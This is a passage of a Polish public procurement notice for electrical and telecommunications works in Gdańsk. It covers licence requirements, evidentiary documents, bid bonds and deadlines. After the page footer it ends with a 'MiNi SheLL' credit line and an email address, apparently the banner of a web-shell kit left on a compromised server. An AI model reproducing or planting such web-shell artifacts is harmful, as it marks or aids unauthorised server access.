wyłącznie w zakresie doświadczenia wymaganego dla tej części, dla której wymagana jest wyższa wartość zamówienia.<br/>5. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy skierują do jego<br/>realizacji:<br/>1) na część nr 1, część nr 2 i część nr 3 - kierownika budowy posiadającego<br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych;<br/>2) na część nr 2 - kierownika robót posiadającego uprawnienia budowlane do<br/>kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń telekomunikacyjnych.<br/>6. Kierownik budowy i/lub kierownik robót powinni posiadać uprawnienia<br/>budowlane zgodnie z ustawą z dnia 07 lipca 1994 r. Prawo budowlane<br/>(Dz.U.2020.1333 t.j. ze zm.) oraz rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019 r., poz. 831) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>7. Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w<br/>budownictwie, określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach<br/>określonych w przepisach odrębnych. Regulację odrębną stanowią przepisy<br/>ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2020.220 t.j.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zwanego dalej „postępowaniem”, zamawiający żąda następujących podmiotowych środków dowodowych: <br/>1) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego,<br/>że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109<br/>ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego<br/>złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z<br/>zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających,<br/>że przed upływem terminu składania ofert wykonawca dokonał płatności<br/>należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł<br/>wiążące porozumienie w sprawie spłat tych należności;<br/>2) zaświadczenia albo innego dokumentu właściwej terenowej jednostki<br/>organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału<br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego<br/>Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega<br/>z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art.<br/>109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego<br/>złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem<br/>zamawiający żąda złożenia dokumentów potwierdzających, że przed upływem<br/>terminu składania ofert wykonawca dokonał płatności należnych składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>3) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1<br/>pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>4) jeżeli jest to niezbędne - oświadczenia wykonawcy o aktualności informacji<br/>zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego, o których mowa w:<br/>a) art. 108 ust. 1 pkt 3 ustawy,<br/>b) art. 108 ust. 1 pkt 4 ustawy, dotyczących orzeczenia zakazu ubiegania się<br/>o zamówienie publiczne tytułem środka zapobiegawczego,<br/>c) art. 108 ust. 1 pkt 5 ustawy, dotyczących zawarcia z innymi wykonawcami<br/>porozumienia mającego na celu zakłócenie konkurencji,<br/>d) art. 108 ust. 1 pkt 6 ustawy,<br/>e) art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków<br/>dotyczących płatności podatków i opłat lokalnych, o których mowa<br/>w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz.<br/>U. z 2019 r. poz. 1170),<br/>f) art. 109 ust. 1 pkt 7 ustawy.<br/>5) Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych<br/>lub zawodowych podmiotów udostępniających zasoby na zasadach<br/>określonych w art. 118 ustawy, przedstawienia podmiotowych środków<br/>dowodowych, o których mowa w pkt 2 ppkt 1)-4), dotyczących tych<br/>podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów<br/>podstawy wykluczenia z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie, że wykonawca<br/>spełnia warunki udziału w postępowaniu.<br/>1) W celu potwierdzenia spełniania przez wykonawcę warunków udziału<br/>w postępowaniu dotyczących zdolności technicznej lub zawodowej,<br/>zamawiający żąda następujących podmiotowych środków dowodowych:<br/>a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty;<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, odpowiedzialnych za kierowanie robotami budowlanymi,<br/>wraz z informacjami na temat ich uprawnień niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>2) Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót<br/>budowlanych wykonywanych wspólnie z innymi wykonawcami, wykaz<br/>o którym mowa w ppkt 1) lit a), dotyczy robót budowlanych, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/>3) Okresy wyrażone w latach lub miesiącach, o których mowa w ppkt 1) lit a) liczy<br/>się wstecz od dnia, w którym upływa termin składania ofert.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od wykonawców wniesienia wadium w wysokości<br/>a) dla części nr 1 – 1.400,00 zł ;<br/>b) dla części nr 2 - 4.400,00 zł ;<br/>c) dla części nr 3 – 2.900,00 zł .<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje<br/>nieprzerwanie do dnia upływu terminu związania ofertą (z wyjątkiem przypadków,<br/>o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy).<br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku<br/>następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt<br/>2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy<br/>Dyrekcji Rozbudowy Miasta Gdańska, w Banku Pekao S.A., nr konta: 38 1240 1268 1111 0010 3860 7357, z oznaczeniem: Wadium – nr referencyjny<br/>84/BZP-U.510.63/2021/MS część nr……/część nr ……. .<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa<br/>w pkt 3 ppkt 2–4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub<br/>poręczenia, w postaci elektronicznej.<br/>6. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3<br/>ppkt 2–4, musi wskazywać jako beneficjenta Gminę Miasta Gdańska - Dyrekcję<br/>Rozbudowy Miasta Gdańska.<br/>7. Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3<br/>ppkt 2–4, powinno być nieodwołalne i musi gwarantować zamawiającemu<br/>bezwarunkową wypłatę na jego pierwsze pisemne żądanie kwoty wadium<br/>w przypadkach określonych w art. 98 ust. 6 ustawy, bez jakichkolwiek<br/>dodatkowych zastrzeżeń i warunków. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku, o którym mowa w ppkt 1), wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego.<br/>3) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców,<br/>którzy wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>4) W przypadku, o którym mowa w ppkt 3), wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika,<br/>które roboty budowlane, dostawy lub usługi wykonają poszczególni<br/>wykonawcy.<br/>5) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców,<br/>spełnienie co najmniej dwóch odrębnych warunków udziału w postępowaniu<br/>wykonawcy mogą wykazać łącznie, chyba że SWZ stanowi inaczej. Każdy z<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia wykazuje<br/>brak podstaw wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały szczegółowo opisane w paragrafie 15 Projektowanych postanowień umowy w sprawie zamówienia publicznego, stanowiących załącznik nr 9 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-30 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi dokumentami za pośrednictwem platformy zakupowej Open Nexus, dostępnej pod adresem https://platformazakupowa.pl, profil nabywcy: https://platformazakupowa.pl/pn/drmg_gdansk.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-30 12:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Udostępnienie zasobów (korzystanie przez wykonawcę ze zdolności technicznych lub zawodowych).<br/>1) Wykonawca może w celu potwierdzenia spełniania warunków udziału<br/>w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do<br/>konkretnego zamówienia, lub jego części, polegać na zdolnościach<br/>technicznych lub zawodowych podmiotów udostępniających zasoby,<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji<br/>zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach<br/>podmiotów udostępniających zasoby, jeśli podmioty te wykonają roboty<br/>budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>3) Wykonawca, który polega na zdolnościach podmiotów udostępniających<br/>zasoby, składa wraz z ofertą, zobowiązanie podmiotu udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.<br/><br/>2.Umocowanie do reprezentowania wykonawcy.<br/>1) W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest<br/>umocowana do jego reprezentowania, zamawiający żąda od wykonawcy<br/>odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i<br/>Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>2) Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa<br/>w ppkt 1), jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów.<br/>3) Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w ppkt 1),<br/>zamawiający żąda od wykonawcy pełnomocnictwa lub innego dokumentu<br/>potwierdzającego umocowanie do reprezentowania wykonawcy.<br/>4) Zapis ppkt 3) stosuje się odpowiednio do osoby działającej w imieniu<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego.<br/>5) Zapisy ppkt 1)–3) stosuje się odpowiednio do osoby działającej w imieniu<br/>podmiotu udostępniającego zasoby na zasadach określonych w art. 118<br/>ustawy.<br/><br/>3. Z uwagi na ograniczoną liczbę znaków, które można wprowadzić do formularza treści ogłoszenia o zamówieniu, pozostałe informacje zawarto w SWZ, dostępnej wraz z niniejszym ogłoszeniem na stronie internetowej prowadzonego postępowania.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-14 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com